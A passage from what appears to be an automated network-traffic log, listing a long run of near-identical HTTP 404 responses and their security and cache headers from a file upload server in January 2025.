'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4ygYu82zC6obV2S2DYWnux_uAmtqMldNyUUubAJgmQ5J715FfIc2a2f3FbVjv2EKgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:46 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-Be2qfYJvuWOeXiKZwBzKzw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7pq1dpBb_fa2D5EzVrDu9ZveZfW3d9tPeBedSfsnqUB99CAj65tplMkp56UW6l0dSpContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:46 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-T99BGiUP7RhfuJ2hfh_iHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7mxnI5ydwAYFyere2_4MlGs8Wqb9AOQZs4BJasRe8jFiqmKw38uEoUi6ilvhBZev6OContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:47 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-bKALfDcY-nvlGkO6-JPvlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6s4gOR73lQMY2UndEO6c0xQrqXONE8Lc_0F69l_x-_MO_Wc5iRYxGwA9J1pm7Of8gContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:48 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-Hx8qXg4mYyKF8vjSsz-mFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4q_i4R9iAPd08uD7c-QZdb6UPJ_76hEqZvuyPyUYc9CmgPSxcxVoF8fp-0jocGfYsodmDvzJMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:51 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-G1EYSmQaVnCZ7We_xeb5tg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC45BK2ZiVCOJTylNCxCU5AqHYXXxu4ssPFjnSNcUIAWSMkmAh3wtStSCJ3paGj3WVVEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:51 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-ZbGoI6AkfDWf08z7tsCxsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC46gvwpuLWds7h9u7lZ6o86Z4IMGuFfONnNlzF2URs8PiH-leQ5UmpaM2JXAX5tXeJGwTUOh0IContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:52 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-BdrCW2XPztuyzis3Ef23rw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7J-nxq6HqfLMYQwZ_QoJWWVk4MszAoPGD8_BrDFzzOuK4UTJB3md9PQtqgnzvKHwsw_2ha0vsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:52 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-N3xFILOYhZaGphVIq2ge3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC68IMqGZPP_J7AFqIJnOfTnvCm4yWsBvlpkpN-yJPBGL8xfigLlcwt9NDbh_xiHc7aIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:54 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-8NyWU9oTUVYrSyKfg1ZMLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7sfKN0H37Su_9SJUFc-2GXhrwQoYbAj0saupF9Ob5GAqecY77dKUsfJ0j4uOeIaqDSContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:55 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-etMRvFvIMZcD9ZcYk71Skg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4bJT-AK1xgGw6CXIPxi7ORxN_wPPXBsmFov6Lh2T1bW8dBHsg5gOhq56EmJ0BwNpZSContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:55 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-cFJ0x-YPeC1h8s5nXPZLmQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5yipHIJRURjqsV3fqP1rVDuJ_E4E5DWPLypA59nBORL4LA0vBSetivf7zBLfrnWG_UContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:56 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-guCN7p2yyVA0nTNM9Emksw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5rpCmOp6GBLlIewz1sOC_4-LHCpJIBC8yDECOdolY20NdmiVshhQitqlaJHteAQ_hYrWP6QPYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:56 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-JCBlBtjVnkQptvRrDkWd5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5oP4QgKmgYUzZvf-JedWYTvOydVlb-stILsoGAXXeE0e2Uihcbci9OFgYcHHeBNisW4ATfltMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:58 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-VR6ahjIG_wg5n4_iPIggVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7zKI6lHdmOUVGkvMYX1JFhOAHlFegcAy3EygHYlNcej5U4I5caa-rekDNPjZ0urTxn6iDkSi0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:59 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-1XR6IPdPjRdXm-ERuWzgvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6FPKwO6G8kt_HYorVVQuVNDcTN3GhSYGlMiOvDsIsSlOeBV2wem5SkJhheK7Y1SkNSContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:59 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-rs8ZQ90njOfWcy-JEvCFjg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC61AdjwDCE993Lec3LWWuh7DTHH5AnsnCy0WiazRtbFAwIaDnmULXSb95YO87J9u8AdContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:30:00 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-EyTL52QY_VYFb6mcynrYLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6DNWYeiua8F-5OD5eGnunBxwdN1_poTRqPj2UEovtk1f43IRU2kWyu3OYn1bXIKhwcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:30:00 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-VW-hgiZNhPwGmRDuhl3LkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC71aGBmOJh2YiWecIkVLzp0KQjq8v0MlQA2WTa5VajLPIDRZiuGP9B4KlIF12FsLJE43QeuZM0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:30:03 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-zJBqW50ToEMMhKOCSZ5CTQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4HC4BzbiNSYs7SCz_pLL2Y8vD4k-tKkJs7JlmH3G4dpsit9TRdPW27Hfl3Dowjkt3nContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:30:03 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-x_tBSapZ8I_qZRaXX4FKww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: 